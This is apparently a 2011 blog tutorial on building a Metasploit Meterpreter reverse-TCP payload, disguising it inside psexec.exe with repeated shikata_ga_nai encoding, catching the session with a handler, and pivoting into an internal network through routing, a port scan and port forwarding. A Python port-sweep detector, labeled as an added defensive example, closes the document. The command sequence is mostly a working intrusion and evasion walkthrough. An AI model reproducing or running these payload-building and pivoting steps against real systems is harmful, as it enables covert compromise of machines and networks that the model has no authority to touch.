03/15/11 Meterpreter encoding & pivot

In this tutorial I use the Back|Track distro and Metasploit to encode psexec.exe, then copy it over to a fully patched Windows XP box. We can get our executable onto the victim machine in a number of ways, and I will save that for later. I have listed the steps involved in using Metasploit below and in the video.
# msfpayload windows/meterpreter/reverse_tcp LHOST=, LPORT=4444 R | msfencode -c 10 -e x86/shikata_ga_nai -x /root/psexec.exe -t exe > psexec3.exe
# msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LPORT 4444
msf> set LHOST
msf> exploit
meterpreter> ipconfig                  This listed 2 different network interfaces &
meterpreter> run arp_scanner -h        Shows the help for the command
meterpreter> run arp_scanner -r
meterpreter> background
msf> route add 1                       The trailing 1 is the ID of the meterpreter session to route through
msf> route print
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS,                       These IPs came from the arp scan we did earlier
msf> set PORTS 1-200                   You can set this to what you like, but a wider range takes longer
msf> run                               Now you have a list of open ports on the internal hosts
msf> back
msf> sessions -i 1
meterpreter> portfwd add -l 8000 -p 80 -r
meterpreter> portfwd add -l 8080 -p 80 -r
open firefox &

Now we have been able to view 2 systems that are internal to the network by pivoting through the meterpreter session. The scan we did went through > > & We then used the portfwd command to display the internal web page locally over SSL.
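From the defender's side, the pivot scan above leaves a distinctive trace: one internal host touching ports 1-200 on other internal hosts within a few minutes, which a workstation never does on its own. The detector below is an added example, not code from the original post; it runs a sliding-window port-fan-out check over constructed flow records, and the addresses, threshold and window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def build_sample_flows():
    """Constructed flow records (ts, src, dst, dport), not real traffic.
    A pivot host 10.0.0.5 (made-up address) sweeps 10.0.0.20 and 10.0.0.21
    over ports 1-200 one second apart, like the portscan/tcp module above,
    while workstation 10.0.0.9 only browses to two web ports."""
    t0 = datetime(2011, 3, 15, 10, 0, 0)
    flows = []
    for i, port in enumerate(range(1, 201)):
        flows.append((t0 + timedelta(seconds=i), "10.0.0.5", "10.0.0.20", port))
        flows.append((t0 + timedelta(seconds=i), "10.0.0.5", "10.0.0.21", port))
    for i, port in enumerate([80, 443, 80, 443]):
        flows.append((t0 + timedelta(minutes=i), "10.0.0.9", "10.0.0.20", port))
    return flows


def find_port_sweeps(flows, min_ports=20, window=timedelta(minutes=5)):
    """Return {src: sorted dsts} for sources that hit at least min_ports
    distinct ports on a single destination within `window` (assumed
    thresholds). A sliding window per (src, dst) pair keeps a slow scan
    spread over hours from being counted as one burst."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in sorted(flows):
        by_pair[(src, dst)].append((ts, dport))
    hits = defaultdict(set)
    for (src, dst), events in by_pair.items():
        recent = deque()                # (ts, port) events inside the window
        port_count = defaultdict(int)   # distinct ports currently in window
        for ts, port in events:
            recent.append((ts, port))
            port_count[port] += 1
            while recent and ts - recent[0][0] > window:   # expire old events
                _, old = recent.popleft()
                port_count[old] -= 1
                if port_count[old] == 0:
                    del port_count[old]
            if len(port_count) >= min_ports:
                hits[src].add(dst)
                break
    return {src: sorted(dsts) for src, dsts in hits.items()}


if __name__ == "__main__":
    for src, dsts in find_port_sweeps(build_sample_flows()).items():
        print(f"possible pivot port sweep from {src} -> {', '.join(dsts)}")
```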

